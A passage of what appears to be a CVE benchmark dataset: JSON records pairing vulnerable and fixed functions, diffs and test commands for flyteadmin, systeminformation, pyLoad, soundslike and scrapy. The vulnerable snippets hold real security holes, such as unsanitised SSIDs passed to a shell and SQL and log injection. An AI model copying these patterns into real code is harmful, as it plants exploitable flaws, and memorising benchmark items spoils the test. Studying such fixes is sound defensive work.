unmarshal user info claim into UserInfo type. 
Error: %w\", err)\n\t}\n\n\treturn verifyClaims(sets.NewString(append(r.allowedAudience, expectedAudience)...), claimsRaw)\n}"}], "fix_func": [{"id": "fix_go_65_1", "commit": "a1ec282d02706e074bc4986fd0412e5da3b9d00a", "file_path": "auth/authzserver/resource_server.go", "start_line": 31, "end_line": 47, "snippet": "func (r ResourceServer) ValidateAccessToken(ctx context.Context, expectedAudience, tokenStr string) (interfaces.IdentityContext, error) {\n\t_, err := r.signatureVerifier.VerifySignature(ctx, tokenStr)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tt, _, err := jwtgo.NewParser().ParseUnverified(tokenStr, jwtgo.MapClaims{})\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to parse token: %v\", err)\n\t}\n\n\tif err = t.Claims.Valid(); err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to validate token: %v\", err)\n\t}\n\n\treturn verifyClaims(sets.NewString(append(r.allowedAudience, expectedAudience)...), t.Claims.(jwtgo.MapClaims))\n}"}, {"id": "fix_go_65_2", "commit": "a1ec282d02706e074bc4986fd0412e5da3b9d00a", "file_path": "auth/authzserver/resource_server.go", "start_line": 7, "end_line": 7, "snippet": "\tjwtgo \"github.com/golang-jwt/jwt/v4\""}], "vul_patch": "--- a/auth/authzserver/resource_server.go\n+++ b/auth/authzserver/resource_server.go\n@@ -1,13 +1,17 @@\n func (r ResourceServer) ValidateAccessToken(ctx context.Context, expectedAudience, tokenStr string) (interfaces.IdentityContext, error) {\n-\traw, err := r.signatureVerifier.VerifySignature(ctx, tokenStr)\n+\t_, err := r.signatureVerifier.VerifySignature(ctx, tokenStr)\n \tif err != nil {\n \t\treturn nil, err\n \t}\n \n-\tclaimsRaw := map[string]interface{}{}\n-\tif err = json.Unmarshal(raw, &claimsRaw); err != nil {\n-\t\treturn nil, fmt.Errorf(\"failed to unmarshal user info claim into UserInfo type. Error: %w\", err)\n+\tt, _, err := jwtgo.NewParser().ParseUnverified(tokenStr, jwtgo.MapClaims{})\n+\tif err != nil {\n+\t\treturn nil, fmt.Errorf(\"failed to parse token: %v\", err)\n \t}\n \n-\treturn verifyClaims(sets.NewString(append(r.allowedAudience, expectedAudience)...), claimsRaw)\n+\tif err = t.Claims.Valid(); err != nil {\n+\t\treturn nil, fmt.Errorf(\"failed to validate token: %v\", err)\n+\t}\n+\n+\treturn verifyClaims(sets.NewString(append(r.allowedAudience, expectedAudience)...), t.Claims.(jwtgo.MapClaims))\n }\n\n--- /dev/null\n+++ b/auth/authzserver/resource_server.go\n@@ -0,0 +1 @@\n+\tjwtgo \"github.com/golang-jwt/jwt/v4\"\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2022-31145:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/flyteadmin\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ngo test -timeout 30s -run ^TestResourceServer_ValidateAccessToken$ github.com/flyteorg/flyteadmin/auth/authzserver\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2022-31145:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/flyteadmin\ngit apply --whitespace=nowarn /workspace/fix.patch\ngo test -timeout 30s -run '^(TestEncryptDecrypt|TestAuthCallbackEndpoint|Test_unmarshalResp|TestGetIssuer|TestResourceServer_ValidateAccessToken|TestAuthEndpoint|Test_getJwksForIssuer|Test_doRequest|TestNewOAuth2ResourceServer)$' github.com/flyteorg/flyteadmin/auth/authzserver\n"} {"cve_id": "CVE-2024-56334", "cve_description": "systeminformation is a System and OS information library for node.js. 
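Aside on CVE-2022-31145 above: the Go fix parses the token and calls `Claims.Valid()` after signature verification, because verifying the signature alone never rejects an expired token. A rough Python analogue, assuming PyJWT purely for illustration (flyteadmin itself uses `golang-jwt` in Go):

```python
# Sketch: verify the signature AND the standard time claims.
# PyJWT and the key below are assumptions for this illustration only.
import time
import jwt  # pip install PyJWT

SECRET = "demo-secret"  # hypothetical symmetric key

expired = jwt.encode(
    {"sub": "alice", "exp": int(time.time()) - 60}, SECRET, algorithm="HS256"
)

# Signature-only posture: the token decodes fine if expiry is not enforced.
claims = jwt.decode(expired, SECRET, algorithms=["HS256"],
                    options={"verify_exp": False})
assert claims["sub"] == "alice"  # accepted despite expiring a minute ago

# Fixed posture: validate time claims too (PyJWT enforces exp by default).
try:
    jwt.decode(expired, SECRET, algorithms=["HS256"])
except jwt.ExpiredSignatureError:
    print("expired token rejected")
```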
In affected versions SSIDs are not sanitized before they are passed as a parameter to cmd.exe in the `getWindowsIEEE8021x` function. This means that malicious content in the SSID can be executed as OS commands. This vulnerability may enable an attacker, depending on how the package is used, to perform remote code execution or local privilege escalation. This issue has been addressed in version 5.23.7 and all users are advised to upgrade. There are no known workarounds for this vulnerability.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/sebhildebrandt/systeminformation", "patch_url": ["https://github.com/sebhildebrandt/systeminformation/commit/f7af0a67b78e7894335a6cad510566a25e06ae41"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_285_1", "commit": "51c7698b91789e00d2308c9f95249ca3bb27a176", "file_path": "lib/network.js", "start_line": 347, "end_line": 356, "snippet": "function getWindowsWirelessIfaceSSID(interfaceName) {\n try {\n const result = execSync(`netsh wlan show interface name=\"${interfaceName}\" | findstr \"SSID\"`, util.execOptsWin);\n const SSID = result.split('\\r\\n').shift();\n const parseSSID = SSID.split(':').pop();\n return parseSSID;\n } catch (error) {\n return 'Unknown';\n }\n}"}, {"id": "vul_js_285_2", "commit": "51c7698b91789e00d2308c9f95249ca3bb27a176", "file_path": "lib/network.js", "start_line": 357, "end_line": 421, "snippet": "function getWindowsIEEE8021x(connectionType, iface, ifaces) {\n let i8021x = {\n state: 'Unknown',\n protocol: 'Unknown',\n };\n\n if (ifaces === 'Disabled') {\n i8021x.state = 'Disabled';\n i8021x.protocol = 'Not defined';\n return i8021x;\n }\n\n if (connectionType == 'wired' && ifaces.length > 0) {\n try {\n // Get 802.1x information by interface name\n const iface8021xInfo = ifaces.find((element) => {\n return element.includes(iface + '\\r\\n');\n });\n const arrayIface8021xInfo = iface8021xInfo.split('\\r\\n');\n const state8021x = arrayIface8021xInfo.find((element) => {\n return element.includes('802.1x');\n });\n\n if (state8021x.includes('Disabled')) {\n i8021x.state = 'Disabled';\n i8021x.protocol = 'Not defined';\n } else if (state8021x.includes('Enabled')) {\n const protocol8021x = arrayIface8021xInfo.find((element) => {\n return element.includes('EAP');\n });\n i8021x.protocol = protocol8021x.split(':').pop();\n i8021x.state = 'Enabled';\n }\n } catch (error) {\n return i8021x;\n 
}\n } else if (connectionType == 'wireless') {\n\n let i8021xState = '';\n let i8021xProtocol = '';\n\n\n\n try {\n const SSID = getWindowsWirelessIfaceSSID(iface);\n if (SSID !== 'Unknown') {\n i8021xState = execSync(`netsh wlan show profiles \"${SSID}\" | findstr \"802.1X\"`, util.execOptsWin);\n i8021xProtocol = execSync(`netsh wlan show profiles \"${SSID}\" | findstr \"EAP\"`, util.execOptsWin);\n }\n\n if (i8021xState.includes(':') && i8021xProtocol.includes(':')) {\n i8021x.state = i8021xState.split(':').pop();\n i8021x.protocol = i8021xProtocol.split(':').pop();\n }\n } catch (error) {\n if (error.status === 1 && error.stdout.includes('AutoConfig')) {\n i8021x.state = 'Disabled';\n i8021x.protocol = 'Not defined';\n }\n return i8021x;\n }\n }\n\n return i8021x;\n}"}], "fix_func": [{"id": "fix_js_285_1", "commit": "f7af0a67b78e7894335a6cad510566a25e06ae41", "file_path": "lib/network.js", "start_line": 347, "end_line": 356, "snippet": "function getWindowsWirelessIfaceSSID(interfaceName) {\n try {\n const result = execSync(`netsh wlan show interface name=\"${interfaceName}\" | findstr \"SSID\"`, util.execOptsWin);\n const SSID = result.split('\\r\\n').shift();\n const parseSSID = SSID.split(':').pop().trim();\n return parseSSID;\n } catch (error) {\n return 'Unknown';\n }\n}"}, {"id": "fix_js_285_2", "commit": "f7af0a67b78e7894335a6cad510566a25e06ae41", "file_path": "lib/network.js", "start_line": 357, "end_line": 431, "snippet": "function getWindowsIEEE8021x(connectionType, iface, ifaces) {\n let i8021x = {\n state: 'Unknown',\n protocol: 'Unknown',\n };\n\n if (ifaces === 'Disabled') {\n i8021x.state = 'Disabled';\n i8021x.protocol = 'Not defined';\n return i8021x;\n }\n\n if (connectionType == 'wired' && ifaces.length > 0) {\n try {\n // Get 802.1x information by interface name\n const iface8021xInfo = ifaces.find((element) => {\n return element.includes(iface + '\\r\\n');\n });\n const arrayIface8021xInfo = iface8021xInfo.split('\\r\\n');\n const state8021x = arrayIface8021xInfo.find((element) => {\n return element.includes('802.1x');\n });\n\n if (state8021x.includes('Disabled')) {\n i8021x.state = 'Disabled';\n i8021x.protocol = 'Not defined';\n } else if (state8021x.includes('Enabled')) {\n const protocol8021x = arrayIface8021xInfo.find((element) => {\n return element.includes('EAP');\n });\n i8021x.protocol = protocol8021x.split(':').pop();\n i8021x.state = 'Enabled';\n }\n } catch (error) {\n return i8021x;\n }\n } else if (connectionType == 'wireless') {\n\n let i8021xState = '';\n let i8021xProtocol = '';\n\n\n\n try {\n const SSID = getWindowsWirelessIfaceSSID(iface);\n if (SSID !== 'Unknown') {\n\n let ifaceSanitized = '';\n const s = util.isPrototypePolluted() ? 
'---' : util.sanitizeShellString(SSID);\n const l = util.mathMin(s.length, 2000);\n\n for (let i = 0; i <= l; i++) {\n if (s[i] !== undefined) {\n ifaceSanitized = ifaceSanitized + s[i];\n }\n }\n i8021xState = execSync(`netsh wlan show profiles \"${ifaceSanitized}\" | findstr \"802.1X\"`, util.execOptsWin);\n i8021xProtocol = execSync(`netsh wlan show profiles \"${ifaceSanitized}\" | findstr \"EAP\"`, util.execOptsWin);\n }\n\n if (i8021xState.includes(':') && i8021xProtocol.includes(':')) {\n i8021x.state = i8021xState.split(':').pop();\n i8021x.protocol = i8021xProtocol.split(':').pop();\n }\n } catch (error) {\n if (error.status === 1 && error.stdout.includes('AutoConfig')) {\n i8021x.state = 'Disabled';\n i8021x.protocol = 'Not defined';\n }\n return i8021x;\n }\n }\n\n return i8021x;\n}"}], "vul_patch": "--- a/lib/network.js\n+++ b/lib/network.js\n@@ -2,7 +2,7 @@\n try {\n const result = execSync(`netsh wlan show interface name=\"${interfaceName}\" | findstr \"SSID\"`, util.execOptsWin);\n const SSID = result.split('\\r\\n').shift();\n- const parseSSID = SSID.split(':').pop();\n+ const parseSSID = SSID.split(':').pop().trim();\n return parseSSID;\n } catch (error) {\n return 'Unknown';\n\n--- a/lib/network.js\n+++ b/lib/network.js\n@@ -44,8 +44,18 @@\n try {\n const SSID = getWindowsWirelessIfaceSSID(iface);\n if (SSID !== 'Unknown') {\n- i8021xState = execSync(`netsh wlan show profiles \"${SSID}\" | findstr \"802.1X\"`, util.execOptsWin);\n- i8021xProtocol = execSync(`netsh wlan show profiles \"${SSID}\" | findstr \"EAP\"`, util.execOptsWin);\n+\n+ let ifaceSanitized = '';\n+ const s = util.isPrototypePolluted() ? '---' : util.sanitizeShellString(SSID);\n+ const l = util.mathMin(s.length, 2000);\n+\n+ for (let i = 0; i <= l; i++) {\n+ if (s[i] !== undefined) {\n+ ifaceSanitized = ifaceSanitized + s[i];\n+ }\n+ }\n+ i8021xState = execSync(`netsh wlan show profiles \"${ifaceSanitized}\" | findstr \"802.1X\"`, util.execOptsWin);\n+ i8021xProtocol = execSync(`netsh wlan show profiles \"${ifaceSanitized}\" | findstr \"EAP\"`, util.execOptsWin);\n }\n \n if (i8021xState.includes(':') && i8021xProtocol.includes(':')) {\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-21645", "cve_description": "pyLoad is the free and open-source Download Manager written in pure Python. A log injection vulnerability was identified in `pyload` allowing any unauthenticated actor to inject arbitrary messages into the logs gathered by `pyload`. Forged or otherwise, corrupted log files can be used to cover an attacker\u2019s tracks or even to implicate another party in the commission of a malicious act. 
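Aside on CVE-2024-56334 above: the patch character-filters the SSID (`util.sanitizeShellString`) before interpolating it into a cmd.exe pipeline. A more general defense, shown here as a Python sketch rather than the project's actual approach, is to avoid the shell entirely and pass untrusted input as a discrete argv element (the SSID value is hypothetical):

```python
# Sketch: shell interpolation vs. argument vectors for untrusted input.
import subprocess
import sys

ssid = 'Home" & calc.exe & "'  # hypothetical malicious SSID

# Vulnerable shape (what the unpatched code effectively did): splice the
# SSID into a cmd.exe string, where `&` acts as a command separator:
#   execSync(`netsh wlan show profiles "${ssid}" | findstr "EAP"`)

# Safer shape: no shell in between, so metacharacters lose all meaning.
# sys.executable stands in for any external program here.
out = subprocess.run(
    [sys.executable, "-c", "import sys; print(sys.argv[1])", ssid],
    capture_output=True, text=True, check=True,
)
assert out.stdout.strip() == ssid  # delivered verbatim, never interpreted
```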
This vulnerability has been patched in version 0.5.0b3.dev77.\n", "cwe_info": {"CWE-74": {"name": "Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')", "description": "The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component."}}, "repo": "https://github.com/pyload/pyload", "patch_url": ["https://github.com/pyload/pyload/commit/4159a1191ec4fe6d927e57a9c4bb8f54e16c381d"], "programing_language": "Python", "vul_func": [{"id": "vul_py_159_1", "commit": "bb22063", "file_path": "src/pyload/webui/app/blueprints/api_blueprint.py", "start_line": 82, "end_line": 97, "snippet": "def login():\n user = flask.request.form[\"username\"]\n password = flask.request.form[\"password\"]\n\n api = flask.current_app.config[\"PYLOAD_API\"]\n user_info = api.check_auth(user, password)\n\n if not user_info:\n log.error(f\"Login failed for user '{user}'\")\n return jsonify(False)\n\n s = set_session(user_info)\n log.info(f\"User '{user}' successfully logged in\")\n flask.flash(\"Logged in successfully\")\n\n return jsonify(s)"}, {"id": "vul_py_159_2", "commit": "bb22063", "file_path": "src/pyload/webui/app/blueprints/app_blueprint.py", "start_line": 47, "end_line": 78, "snippet": "def login():\n api = flask.current_app.config[\"PYLOAD_API\"]\n\n next = get_redirect_url(fallback=flask.url_for(\"app.dashboard\"))\n\n if flask.request.method == \"POST\":\n user = flask.request.form[\"username\"]\n password = flask.request.form[\"password\"]\n user_info = api.check_auth(user, password)\n\n if not user_info:\n log.error(f\"Login failed for user '{user}'\")\n return render_template(\"login.html\", next=next, errors=True)\n\n set_session(user_info)\n log.info(f\"User '{user}' successfully logged in\")\n flask.flash(\"Logged in successfully\")\n\n if is_authenticated():\n return flask.redirect(next)\n\n if api.get_config_value(\"webui\", \"autologin\"):\n allusers = api.get_all_userdata()\n if len(allusers) == 1: # TODO: check if localhost\n user_info = list(allusers.values())[0]\n set_session(user_info)\n # NOTE: Double-check authentication here because if session[name] is empty,\n # next login_required redirects here again and all loop out.\n if is_authenticated():\n return flask.redirect(next)\n\n return render_template(\"login.html\", next=next)"}], "fix_func": [{"id": "fix_py_159_1", "commit": "4159a11", "file_path": "src/pyload/webui/app/blueprints/api_blueprint.py", "start_line": 82, "end_line": 98, "snippet": "def login():\n user = flask.request.form[\"username\"]\n password = flask.request.form[\"password\"]\n\n api = flask.current_app.config[\"PYLOAD_API\"]\n user_info = api.check_auth(user, password)\n\n sanitized_user = user.replace(\"\\n\", \"\\\\n\").replace(\"\\r\", \"\\\\r\")\n if not user_info:\n log.error(f\"Login failed for user '{sanitized_user}'\")\n return jsonify(False)\n\n s = set_session(user_info)\n log.info(f\"User '{sanitized_user}' successfully logged in\")\n flask.flash(\"Logged in successfully\")\n\n return jsonify(s)"}, {"id": "fix_py_159_2", "commit": "4159a11", "file_path": "src/pyload/webui/app/blueprints/app_blueprint.py", "start_line": 47, "end_line": 79, "snippet": "def login():\n api = flask.current_app.config[\"PYLOAD_API\"]\n\n next = get_redirect_url(fallback=flask.url_for(\"app.dashboard\"))\n\n 
if flask.request.method == \"POST\":\n user = flask.request.form[\"username\"]\n password = flask.request.form[\"password\"]\n user_info = api.check_auth(user, password)\n\n sanitized_user = user.replace(\"\\n\", \"\\\\n\").replace(\"\\r\", \"\\\\r\")\n if not user_info:\n log.error(f\"Login failed for user '{sanitized_user}'\")\n return render_template(\"login.html\", next=next, errors=True)\n\n set_session(user_info)\n log.info(f\"User '{sanitized_user}' successfully logged in\")\n flask.flash(\"Logged in successfully\")\n\n if is_authenticated():\n return flask.redirect(next)\n\n if api.get_config_value(\"webui\", \"autologin\"):\n allusers = api.get_all_userdata()\n if len(allusers) == 1: # TODO: check if localhost\n user_info = list(allusers.values())[0]\n set_session(user_info)\n # NOTE: Double-check authentication here because if session[name] is empty,\n # next login_required redirects here again and all loop out.\n if is_authenticated():\n return flask.redirect(next)\n\n return render_template(\"login.html\", next=next)"}], "vul_patch": "--- a/src/pyload/webui/app/blueprints/api_blueprint.py\n+++ b/src/pyload/webui/app/blueprints/api_blueprint.py\n@@ -5,12 +5,13 @@\n api = flask.current_app.config[\"PYLOAD_API\"]\n user_info = api.check_auth(user, password)\n \n+ sanitized_user = user.replace(\"\\n\", \"\\\\n\").replace(\"\\r\", \"\\\\r\")\n if not user_info:\n- log.error(f\"Login failed for user '{user}'\")\n+ log.error(f\"Login failed for user '{sanitized_user}'\")\n return jsonify(False)\n \n s = set_session(user_info)\n- log.info(f\"User '{user}' successfully logged in\")\n+ log.info(f\"User '{sanitized_user}' successfully logged in\")\n flask.flash(\"Logged in successfully\")\n \n return jsonify(s)\n\n--- a/src/pyload/webui/app/blueprints/app_blueprint.py\n+++ b/src/pyload/webui/app/blueprints/app_blueprint.py\n@@ -8,12 +8,13 @@\n password = flask.request.form[\"password\"]\n user_info = api.check_auth(user, password)\n \n+ sanitized_user = user.replace(\"\\n\", \"\\\\n\").replace(\"\\r\", \"\\\\r\")\n if not user_info:\n- log.error(f\"Login failed for user '{user}'\")\n+ log.error(f\"Login failed for user '{sanitized_user}'\")\n return render_template(\"login.html\", next=next, errors=True)\n \n set_session(user_info)\n- log.info(f\"User '{user}' successfully logged in\")\n+ log.info(f\"User '{sanitized_user}' successfully logged in\")\n flask.flash(\"Logged in successfully\")\n \n if is_authenticated():\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2017-20172", "cve_description": "A vulnerability was found in ridhoq soundslike. It has been classified as critical. Affected is the function get_song_relations of the file app/api/songs.py. The manipulation leads to sql injection. The patch is identified as 90bb4fb667d9253d497b619b9adaac83bf0ce0f8. It is recommended to apply a patch to fix this issue. VDB-218490 is the identifier assigned to this vulnerability.", "cwe_info": {"CWE-89": {"name": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')", "description": "The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. 
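Aside on CVE-2024-21645 above: the fix is the two `replace` calls that escape CR/LF in the username before it reaches the logger, so one request can no longer emit what looks like two log records. The same idea as a standalone sketch:

```python
# Sketch of the CR/LF-escaping idea used in the pyload fix above.
import logging

logging.basicConfig(level=logging.INFO, format="%(levelname)s %(message)s")
log = logging.getLogger("demo")

def sanitize(value: str) -> str:
    # Escape newlines so one login attempt cannot emit two log records.
    return value.replace("\n", "\\n").replace("\r", "\\r")

attacker = "bob\nINFO User 'admin' successfully logged in"  # forged 2nd line
log.error("Login failed for user '%s'", sanitize(attacker))
# Logged as a single line:
# ERROR Login failed for user 'bob\nINFO User 'admin' successfully logged in'
```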
Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data."}}, "repo": "https://github.com/ridhoq/soundslike", "patch_url": ["https://github.com/ridhoq/soundslike/commit/90bb4fb667d9253d497b619b9adaac83bf0ce0f8"], "programing_language": "Python", "vul_func": [{"id": "vul_py_339_1", "commit": "d45460ef045843c711536a4a24973d73d0aa7569", "file_path": "app/api/songs.py", "start_line": 64, "end_line": 69, "snippet": "def get_song_relations(id):\n top = request.args.get('top')\n song = Song.query.filter_by(id=id).first()\n if not song:\n return route_not_found(song)\n return make_response(jsonify(song.get_related_songs_json(top)), 200)"}], "fix_func": [{"id": "fix_py_339_1", "commit": "90bb4fb667d9253d497b619b9adaac83bf0ce0f8", "file_path": "app/api/songs.py", "start_line": 64, "end_line": 73, "snippet": "def get_song_relations(id):\n top_str = request.args.get('top')\n if not top_str.isdigit() or not int(top_str) > 0:\n message = 'top query param must be an int greater than 0'\n return bad_request(message)\n top = int(request.args.get('top'))\n song = Song.query.filter_by(id=id).first()\n if not song:\n return route_not_found(song)\n return make_response(jsonify(song.get_related_songs_json(top)), 200)"}], "vul_patch": "--- a/app/api/songs.py\n+++ b/app/api/songs.py\n@@ -1,5 +1,9 @@\n def get_song_relations(id):\n- top = request.args.get('top')\n+ top_str = request.args.get('top')\n+ if not top_str.isdigit() or not int(top_str) > 0:\n+ message = 'top query param must be an int greater than 0'\n+ return bad_request(message)\n+ top = int(request.args.get('top'))\n song = Song.query.filter_by(id=id).first()\n if not song:\n return route_not_found(song)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-0577", "cve_description": "Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository scrapy/scrapy prior to 2.6.1.", "cwe_info": {"CWE-863": {"name": "Incorrect Authorization", "description": "The product performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check."}}, "repo": "https://github.com/scrapy/scrapy", "patch_url": ["https://github.com/scrapy/scrapy/commit/8ce01b3b76d4634f55067d6cfdf632ec70ba304a"], "programing_language": "Python", "vul_func": [{"id": "vul_py_49_1", "commit": "aa0306a", "file_path": "scrapy/downloadermiddlewares/redirect.py", "start_line": 49, "end_line": 53, "snippet": " def _redirect_request_using_get(self, request, redirect_url):\n redirected = request.replace(url=redirect_url, method='GET', body='')\n redirected.headers.pop('Content-Type', None)\n redirected.headers.pop('Content-Length', None)\n return redirected"}, {"id": "vul_py_49_2", "commit": "aa0306a", "file_path": "scrapy/downloadermiddlewares/redirect.py", "start_line": 62, "end_line": 87, "snippet": " def process_response(self, request, response, spider):\n if (\n request.meta.get('dont_redirect', False)\n or response.status in getattr(spider, 'handle_httpstatus_list', [])\n or response.status in request.meta.get('handle_httpstatus_list', [])\n or request.meta.get('handle_httpstatus_all', False)\n ):\n return response\n\n allowed_status = (301, 302, 303, 307, 308)\n if 'Location' not in response.headers or response.status not in allowed_status:\n return response\n\n location = safe_url_string(response.headers['Location'])\n if 
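Aside on CVE-2017-20172 above: the patch validates that `top` is a positive integer before handing it to the query layer. The sketch below pairs that check with a bound parameter, using an in-memory sqlite3 table as a stand-in for the app's real schema (table and column names are hypothetical):

```python
# Sketch: validate + parameterize instead of splicing request args into SQL.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE songs (id INTEGER PRIMARY KEY, title TEXT)")
conn.executemany("INSERT INTO songs (title) VALUES (?)",
                 [("a",), ("b",), ("c",)])

def related_songs(top_str: str):
    # Mirror of the fix: reject anything that is not a positive integer.
    if not top_str.isdigit() or int(top_str) <= 0:
        raise ValueError("top query param must be an int greater than 0")
    top = int(top_str)
    # Bound value, never string formatting, so LIMIT cannot be injected.
    return conn.execute("SELECT title FROM songs LIMIT ?", (top,)).fetchall()

print(related_songs("2"))                # [('a',), ('b',)]
# related_songs("1; DROP TABLE songs")   # raises ValueError before any SQL
```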
response.headers['Location'].startswith(b'//'):\n request_scheme = urlparse(request.url).scheme\n location = request_scheme + '://' + location.lstrip('/')\n\n redirected_url = urljoin(request.url, location)\n\n if response.status in (301, 307, 308) or request.method == 'HEAD':\n redirected = request.replace(url=redirected_url)\n return self._redirect(redirected, request, spider, response.status)\n\n redirected = self._redirect_request_using_get(request, redirected_url)\n return self._redirect(redirected, request, spider, response.status)"}], "fix_func": [{"id": "fix_py_49_1", "commit": "8ce01b3", "file_path": "scrapy/downloadermiddlewares/redirect.py", "start_line": 65, "end_line": 74, "snippet": " def _redirect_request_using_get(self, request, redirect_url):\n redirect_request = _build_redirect_request(\n request,\n url=redirect_url,\n method='GET',\n body='',\n )\n redirect_request.headers.pop('Content-Type', None)\n redirect_request.headers.pop('Content-Length', None)\n return redirect_request"}, {"id": "fix_py_49_2", "commit": "8ce01b3", "file_path": "scrapy/downloadermiddlewares/redirect.py", "start_line": 83, "end_line": 108, "snippet": " def process_response(self, request, response, spider):\n if (\n request.meta.get('dont_redirect', False)\n or response.status in getattr(spider, 'handle_httpstatus_list', [])\n or response.status in request.meta.get('handle_httpstatus_list', [])\n or request.meta.get('handle_httpstatus_all', False)\n ):\n return response\n\n allowed_status = (301, 302, 303, 307, 308)\n if 'Location' not in response.headers or response.status not in allowed_status:\n return response\n\n location = safe_url_string(response.headers['Location'])\n if response.headers['Location'].startswith(b'//'):\n request_scheme = urlparse(request.url).scheme\n location = request_scheme + '://' + location.lstrip('/')\n\n redirected_url = urljoin(request.url, location)\n\n if response.status in (301, 307, 308) or request.method == 'HEAD':\n redirected = _build_redirect_request(request, url=redirected_url)\n return self._redirect(redirected, request, spider, response.status)\n\n redirected = self._redirect_request_using_get(request, redirected_url)\n return self._redirect(redirected, request, spider, response.status)"}, {"id": "fix_py_49_3", "commit": "8ce01b3", "file_path": "scrapy/downloadermiddlewares/redirect.py", "start_line": 15, "end_line": 27, "snippet": "def _build_redirect_request(source_request, *, url, method=None, body=None):\n redirect_request = source_request.replace(\n url=url,\n method=method,\n body=body,\n cookies=None,\n )\n if 'Cookie' in redirect_request.headers:\n source_request_netloc = urlparse_cached(source_request).netloc\n redirect_request_netloc = urlparse_cached(redirect_request).netloc\n if source_request_netloc != redirect_request_netloc:\n del redirect_request.headers['Cookie']\n return redirect_request"}], "vul_patch": "--- a/scrapy/downloadermiddlewares/redirect.py\n+++ b/scrapy/downloadermiddlewares/redirect.py\n@@ -1,5 +1,10 @@\n def _redirect_request_using_get(self, request, redirect_url):\n- redirected = request.replace(url=redirect_url, method='GET', body='')\n- redirected.headers.pop('Content-Type', None)\n- redirected.headers.pop('Content-Length', None)\n- return redirected\n+ redirect_request = _build_redirect_request(\n+ request,\n+ url=redirect_url,\n+ method='GET',\n+ body='',\n+ )\n+ redirect_request.headers.pop('Content-Type', None)\n+ redirect_request.headers.pop('Content-Length', None)\n+ return redirect_request\n\n--- 
a/scrapy/downloadermiddlewares/redirect.py\n+++ b/scrapy/downloadermiddlewares/redirect.py\n@@ -19,7 +19,7 @@\n redirected_url = urljoin(request.url, location)\n \n if response.status in (301, 307, 308) or request.method == 'HEAD':\n- redirected = request.replace(url=redirected_url)\n+ redirected = _build_redirect_request(request, url=redirected_url)\n return self._redirect(redirected, request, spider, response.status)\n \n redirected = self._redirect_request_using_get(request, redirected_url)\n\n--- /dev/null\n+++ b/scrapy/downloadermiddlewares/redirect.py\n@@ -0,0 +1,13 @@\n+def _build_redirect_request(source_request, *, url, method=None, body=None):\n+ redirect_request = source_request.replace(\n+ url=url,\n+ method=method,\n+ body=body,\n+ cookies=None,\n+ )\n+ if 'Cookie' in redirect_request.headers:\n+ source_request_netloc = urlparse_cached(source_request).netloc\n+ redirect_request_netloc = urlparse_cached(redirect_request).netloc\n+ if source_request_netloc != redirect_request_netloc:\n+ del redirect_request.headers['Cookie']\n+ return redirect_request\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2022-0577:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/scrapy\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\n/workspace/PoC_env/CVE-2022-0577/bin/python -m pytest tests/test_downloadermiddleware_cookies.py -k \"test_cookie_redirect_ or test_cookie_header_redirect_\" -p no:warning --disable-warnings\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2022-0577:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/scrapy\ngit apply --whitespace=nowarn /workspace/fix.patch\n/workspace/PoC_env/CVE-2022-0577/bin/python -m pytest tests/test_downloadermiddleware_cookies.py -p no:warning --disable-warnings\n"} {"cve_id": "CVE-2022-2422", "cve_description": "Due to improper input validation in the Feathers js library, it is possible to perform a SQL injection attack on the back-end database, in case the feathers-sequelize package is used.", "cwe_info": {"CWE-89": {"name": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')", "description": "The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. 
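Aside on CVE-2022-0577 above: the new `_build_redirect_request` helper drops the `Cookie` header whenever the redirect target's netloc differs from the source's, so session cookies are not replayed to a foreign host. The core rule, reduced to a dependency-free sketch (function name hypothetical):

```python
# Sketch of the "strip cookies on cross-netloc redirects" rule.
from urllib.parse import urlparse

def redirect_headers(headers: dict, source_url: str, target_url: str) -> dict:
    out = dict(headers)
    if urlparse(source_url).netloc != urlparse(target_url).netloc:
        out.pop("Cookie", None)  # never leak cookies to a foreign host
    return out

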